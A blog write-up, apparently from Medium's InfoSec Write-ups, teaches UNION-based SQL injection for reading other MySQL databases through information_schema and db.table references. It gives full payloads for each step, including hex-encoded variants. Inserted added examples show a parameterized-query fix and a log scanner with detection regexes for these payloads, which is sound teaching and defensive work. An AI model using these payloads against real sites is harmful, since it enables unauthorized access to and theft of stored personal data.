A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up

Atmanand Nagpure
Mar 21, 2019 · 5 min read

Hey there! Back again with another article about SQL injection techniques.
I've been seeing a lot of beginners at SQL injection. While they try to extract data from the database, they ignore the fact that they can do better.
Note that I don’t have any bad intention to destroy any website or any organization. This post is only for educational purposes.

The problem:

The problem with beginners is that they only extract data from the database in which the vulnerable query is executed. They don't even try to access other databases and their content. Intermediate and advanced SQL injectors are usually aware that, if the query is executed with sufficient privileges, the attacker can access other databases on that SQL server.
So, let's take a look at how it's done.

The Solution:


Step 1:

The first part of the exploitation sequence is to extract the names of the databases present on the server. This can be done quite easily using group concatenation and UNION SELECT.

So, let’s extract database names on the server.

Query: ?param=' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(schema_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.schemata)a),3,4,5,6,7,8,9 -- -

Explanation:

The original query returns 9 columns. You can find the count using the ORDER BY technique. So I wrote UNION ALL SELECT 1,2,3,4,5,6,7,8,9, saw that the value at position 2 is reflected in the page, and replaced that position with my own nested SELECT query.

The GROUP_CONCAT() function concatenates all the rows of the returned result into one string; the 0x0a (a newline) after each name separates the entries. Here I used a nested SELECT. In the inner SELECT statement, I selected all the rows of the information_schema.schemata table.
information_schema.schemata is a table in which the names and other information of all databases present on that server are stored.

I performed an explicit cast of the GROUP_CONCAT() result to CHAR(4096) to enlarge the result buffer and show more of the result. Note that GROUP_CONCAT() output is still bounded by the server's group_concat_max_len setting (1024 bytes by default), so a long list may be cut off. You can use LIMIT m,n in MySQL and some other servers to skip m rows and return the next n.

Result 1:

[Image: Databases present on the server.]

Step 2:


The next thing to do is to extract the table names from the database of our choice.
Let's extract the tables of a database named 'training'. Here's how we'll do it:

Query: ' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(table_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.tables WHERE table_schema='training')a),3,4,5,6,7,8,9 -- -

Result 2:

[Image: Tables present in database 'training']

Step 3:


Next, we'll extract the column names from the table of our choice. This can be done in other ways, such as Dump-in-one-shot (DIOS) SQL injection, but to keep things simple and beginner-friendly let's stick to the basic approach.

Let’s extract column names from the table named ‘start_15_users’ using the following query:

Query: ' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(column_name,0x0a) as CHAR(4096)) FROM (SELECT * FROM information_schema.columns WHERE table_name='start_15_users')a),3,4,5,6,7,8,9 -- -

Result 3:

[Image: Column names extracted from the table named 'start_15_users']

And here comes the beginner problem:

Many beginners don't know how to extract data from a different database.
Structured Query Language (SQL) provides a feature for reading data from another database: the '.' (dot) operator, which qualifies a table name with the database it belongs to.

Usage:

SELECT * from database_name.table_name;

It is that simple. But most beginners still don't know this technique.
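The same lookup built two ways, as an added example that is not code from the post: the concatenated query lets the post's `' AND 1=2 UNION ALL SELECT ...` payload reach `training.start_15_users` through the dot operator, while the bound-parameter version treats the whole value as data. It uses sqlite3 with an ATTACHed second database standing in for a second MySQL database; the `products` table, its rows and the `start_15_users` rows are constructed here.

```python
"""Added example, not from the original post: a lookup built by string
concatenation beside the same lookup with a bound parameter. sqlite3 with
an ATTACHed second database stands in for the MySQL server in the post."""
import sqlite3

# Payload in the post's shape, trimmed to this query's 3 columns and to
# SQLite syntax: group_concat() and char(10) instead of GROUP_CONCAT()/0x0a.
PAYLOAD = ("' AND 1=2 UNION ALL SELECT 1,(SELECT group_concat(EmpCode, char(10)) "
           "FROM training.start_15_users),3 -- -")


def build_server():
    """One connection, two databases: `main` holds the app's own table,
    `training` is a second database the app has no business reading.
    All tables and rows here are constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.execute("ATTACH DATABASE ':memory:' AS training")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1,'lamp',9.5),(2,'desk',120.0);
        CREATE TABLE training.start_15_users(UserID INTEGER, EmpCode TEXT,
                                             DOB TEXT, IsActive INTEGER);
        INSERT INTO training.start_15_users VALUES (7,'E0042','1990-01-01',1),
                                                   (8,'E0107','1985-06-30',0);
    """)
    return con


def lookup_vulnerable(con, name):
    # The value is pasted into the SQL text: a quote ends the literal and the
    # rest of the value is parsed as SQL, db.table reference included.
    sql = f"SELECT id, name, price FROM products WHERE name = '{name}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, name):
    # The value travels as a bound parameter: it is compared, never parsed.
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return con.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    con = build_server()
    print(lookup_vulnerable(con, PAYLOAD))  # one row carrying EmpCode values from the other database
    print(lookup_safe(con, PAYLOAD))        # []
```

On a real MySQL server the second control is the account the application connects with: a user granted privileges only on its own database cannot select from `training.*` even when the injection itself succeeds.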


Final Step:


So, let’s actually get data from the table named ‘start_15_users’.

Queries:

' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT("UserId:",UserID,0x3a,"EmpCode:",EmpCode,0x3a,"DOB:",DOB,0x3a,"IsActive:",IsActive,0x0a) as CHAR(4096)) FROM (SELECT * FROM training.start_15_users)a),3,4,5,6,7,8,9 -- -

is the same as:

' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(0x5573657249643a,UserID,0x3a,0x456d70436f64653a,EmpCode,0x3a,0x444f423a,DOB,0x3a,0x49734163746976653a,IsActive,0x0a) as CHAR(4096)) FROM (SELECT * FROM training.start_15_users)a),3,4,5,6,7,8,9 -- -

is the same as:

' AND 1=2 UNION ALL SELECT 1,(SELECT CAST(GROUP_CONCAT(0x55,0x73,0x65,0x72,0x49,0x64,0x3a,UserID,0x3a,0x45,0x6d,0x70,0x43,0x6f,0x64,0x65,0x3a,EmpCode,0x3a,0x44,0x4f,0x42,0x3a,DOB,0x3a,0x49,0x73,0x41,0x63,0x74,0x69,0x76,0x65,0x3a,IsActive,0x0a) as CHAR(4096)) FROM (SELECT * FROM training.start_15_users)a),3,4,5,6,7,8,9 -- -

Final Result:

[Image: Final data extracted from the table named 'start_15_users']
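The detection side of the procedure above, as an added example rather than anything from the post: the three spellings of the label list differ only in how the strings are written, so a log check should decode MySQL hex literals before matching. This scans constructed access-log lines for the markers every query in this write-up uses (UNION ... SELECT, information_schema, GROUP_CONCAT, and a db.table reference after FROM); the log lines, paths and regular expressions are my own.

```python
"""Added example (not from the original post): flag requests carrying the
query shapes shown in this write-up. Log lines and patterns are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines: a benign request, then the post's step-1 and
# final-step payloads, URL-encoded the way a browser would send them.
LOG_LINES = [
    '10.0.0.5 - - [21/Mar/2019:10:01:02 +0000] "GET /items.php?param=42 HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Mar/2019:10:01:07 +0000] "GET /items.php?param=%27%20AND%201%3D2%20UNION'
    '%20ALL%20SELECT%201%2C%28SELECT%20CAST%28GROUP_CONCAT%28schema_name%2C0x0a%29%20as%20CHAR'
    '%284096%29%29%20FROM%20%28SELECT%20%2A%20FROM%20information_schema.schemata%29a%29%2C3'
    '%20--%20- HTTP/1.1" 200 2048',
    '10.0.0.9 - - [21/Mar/2019:10:02:11 +0000] "GET /items.php?param=%27%20AND%201%3D2%20UNION'
    '%20ALL%20SELECT%201%2C%28SELECT%20GROUP_CONCAT%280x5573657249643a%2CUserID%2C0x0a%29'
    '%20FROM%20training.start_15_users%29%2C3%20--%20- HTTP/1.1" 200 1900',
]

HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    # db.table after FROM: the cross-database read the post is about
    ("qualified_table_name", re.compile(r"\bfrom\s+[a-z_]\w*\.[a-z_]\w*", re.I)),
]


def decode_hex_literals(text):
    """Turn MySQL hex literals back into text (0x5573657249643a -> 'UserId:')
    so all three spellings in the post match the same patterns; odd-length or
    non-ASCII literals are left untouched."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            return bytes.fromhex(digits).decode("ascii")
        except UnicodeDecodeError:
            return m.group(0)
    return HEX_LITERAL.sub(repl, text)


def inspect_request(log_line):
    """Return (path, sorted indicator names) for one access-log line."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', log_line)
    if not m:
        return None, []
    url = urlsplit(m.group(1))
    found = set()
    # parse_qsl URL-decodes each value once; hex literals are decoded after that
    for _, value in parse_qsl(url.query, keep_blank_values=True):
        text = decode_hex_literals(value)
        found.update(name for name, pat in INDICATORS if pat.search(text))
    return url.path, sorted(found)
```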

Final Notes:


That’s all for today!
Thank you for reading!

Regards,
Atmanand Nagpure (proghax333)

My other post: .NET SQL Injection through errors: https://medium.com/@skillzworldtech/sql-injection-data-extraction-through-net-framework-error-ec9972858321


InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Atmanand Nagpure

Written by

Aka. proghax333 | Hacker | Software Developer | Security Researcher | Music Producer | Sound Designer Wanna explore everything!💗
